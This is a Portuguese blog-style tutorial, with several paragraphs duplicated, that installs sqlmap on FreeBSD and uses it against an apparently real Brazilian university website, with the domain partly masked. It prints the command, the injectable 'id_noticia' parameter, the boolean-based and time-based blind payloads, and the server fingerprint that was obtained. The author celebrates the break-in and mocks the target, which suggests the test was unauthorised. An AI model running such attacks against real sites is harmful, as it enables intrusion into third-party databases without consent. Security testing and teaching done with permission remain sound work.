Festa com SQL injection
SQL injection é uma tática hacker que utiliza uma linguagem bem conhecida: SQL (Structured Query Language) ou Linguagem de Consulta Estruturada, é utilizada pela maioria dos SGDB "software livre" do Brasil e do mundo. Ela pode ser uma solução, ou um problema na vida de um administrador de redes.
Parte 2: Funfando bacana!
Let's go!
Para tranquilizar a galera do bem, informo que o sqlmap é multiplataforma e pode ser instalado em qualquer operation system. Apesar de ser 'amigo íntimoa de BSD system.
Vamos deixar de brincadeira e mão na massa, mas, com base F-BSD, é claro!
Depois de atualizar seu ports, faça:
# cd /usr/ports/security/sqlmap/
# make install clean
De qualquer ponto do sistema, escolha o alvo e vamos 'funfar':
# sqlmap --url "http://www.?????????.edu.br/XXXXXX/conc_docs/XXXX/?id_noticia=85" -b
Código de retorno:
A festa está feita!!! :-)
Para simplificar, o sqlmap testa todos os possíveis SGBDs com os [Ids] informados na URL. Mas caso você conheça um [Ids] vulnerável, pode setar.
Escancarou as linhas:
Compartilho da felicidade com meus amigos acadêmicos por ter sistemas de defesas assim.
Avisa esse cara para parar de relaxar com banners, pô!!!
Para tranquilizar a galera do bem, informo que o sqlmap é multiplataforma e pode ser instalado em qualquer operation system. Apesar de ser 'amigo íntimoa de BSD system.
Vamos deixar de brincadeira e mão na massa, mas, com base F-BSD, é claro!
Depois de atualizar seu ports, faça:
# cd /usr/ports/security/sqlmap/
# make install clean
De qualquer ponto do sistema, escolha o alvo e vamos 'funfar':
# sqlmap --url "http://www.?????????.edu.br/XXXXXX/conc_docs/XXXX/?id_noticia=85" -b
Explicando 01
O parâmetro [-b] , pesquisa a versão do SGBD - Sistema gerenciador do banco.Código de retorno:
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 20:23:28
[20:23:28] [INFO] using '/usr/local/lib/python2.7/
site-packages/sqlmap/output/www.??????.xxxxx.br/session' as session file
[20:23:29] [INFO] testing connection to the target url
[20:23:31] [INFO] testing if the url is stable, wait a few seconds
[20:23:33] [INFO] url is stable
[20:23:33] [INFO] testing if GET parameter 'id_noticia' is dynamic
[20:23:34] [INFO] confirming that GET parameter 'id_noticia' is dynamic
[20:23:35] [INFO] GET parameter 'id_noticia' is dynamic
[20:23:36] [WARNING] heuristic
test shows that GET parameter 'id_noticia' might not be injectable
[20:23:36] [INFO] testing sql injection on GET parameter 'id_noticia'
[20:23:36] [INFO] testing
'AND boolean-based blind - WHERE or HAVING clause'
[20:23:49] [INFO] GET parameter 'id_noticia' is 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[20:23:49] [INFO] testing 'MySQL >= 5.0 AND error-based -
WHERE or HAVING clause'
[20:23:50] [INFO] testing 'PostgreSQL AND error-based -
WHERE or HAVING clause'
[20:23:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
WHERE or HAVING clause'
[20:23:52] [INFO] testing 'Oracle AND error-based -
WHERE or HAVING clause (XMLType)'
[20:23:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:23:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:23:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:23:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:24:09] [INFO] GET parameter 'id_noticia' is
'MySQL > 5.0.11 AND time-based blind' injectable
[20:24:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:24:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id_noticia' is vulnerable.
Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points
with a total of 40 HTTP(s) requests:
---
Place: GET
Parameter: id_noticia
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id_noticia=85' AND 1304=1304 AND 'JTax'='JTax
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id_noticia=85' AND SLEEP(5) AND 'kFej'='kFej
---
[20:24:45] [INFO] the back-end DBMS is MySQL
[20:24:45] [INFO] fetching banner
[20:24:45] [INFO] retrieved: 5.1.41-3ubuntu12.10
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.11
banner: '5.1.41-3ubuntu12.10'
[20:27:49] [INFO] Fetched data logged to text files under
'/usr/local/lib/python2.7/
site-packages/sqlmap/output/www.????????.edu.br'
[*] shutting down at: 20:27:49
()rsrsrsrs... desculpa gente, mas foi difícil me conter)A festa está feita!!! :-)
Para simplificar, o sqlmap testa todos os possíveis SGBDs com os [Ids] informados na URL. Mas caso você conheça um [Ids] vulnerável, pode setar.
Escancarou as linhas:
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.11
banner: '5.1.41-3ubuntu12.10'
Compartilho da felicidade com meus amigos acadêmicos por ter sistemas de defesas assim.
Avisa esse cara para parar de relaxar com banners, pô!!!